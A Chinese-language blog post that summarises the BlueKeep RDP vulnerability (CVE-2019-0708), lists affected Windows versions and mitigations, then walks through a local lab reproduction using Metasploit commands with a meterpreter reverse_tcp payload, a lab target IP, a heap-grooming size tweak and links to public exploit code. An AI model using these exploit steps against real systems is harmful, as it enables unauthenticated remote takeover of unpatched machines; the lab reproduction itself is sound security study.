CVE-2019-0708复现

CVE-2019-0708漏洞

1.漏洞概述

20190514日,微软发布了针对Windows远程桌面服务远程执行代码漏洞(CVE-20190708)的补丁,利用该漏洞攻击者能在未认证的情况下,通过发送特殊请求,在目标系统上执行任意代码,从而获取目标系统控制权限。该漏洞影响范围广泛,从Windows XPserver 2008 R2,危害被官方评级为严重,如存在该漏洞的用户应尽快安全补丁对该漏洞进行修补。

2.受影响版本

Windows XP

Windows 7

Windows Server 2003

Windows Server 2008

Windows Server 2008 R2

3. 防护建议

1)请及时更新官方系统补丁,补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

2)关闭远程桌面服务

3)开启网络身份验证(NLA

本地复现

我这里用的镜像是windows7 sp1

 exp具体地址及其msf配置https://github.com/NAXG/cve_2019_0708_bluekeep_rce,记得reload_all加载新加的模块

search 0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts 192.168.41.150
show payloads

set payload windows/x64/meterpreter/reverse_tcp
show targets

set target 3
set lohost 192.168.41.147

 

 一直报错,重装N遍。宣告失败

经历了三个小时折磨,通过设置

GROOMSIZE=50,成功发送并且打到蓝屏。.=

献上一直reset by peer的朋友这篇文章https://github.com/TinToSer/bluekeep-exploit

应该是基于虚拟机内存配置的不同可能需要自己调整

成功,搞了4个小时。翻到了这篇文章。感谢这位外国朋友

  

原文地址:https://www.cnblogs.com/BOHB-yunying/p/11518504.html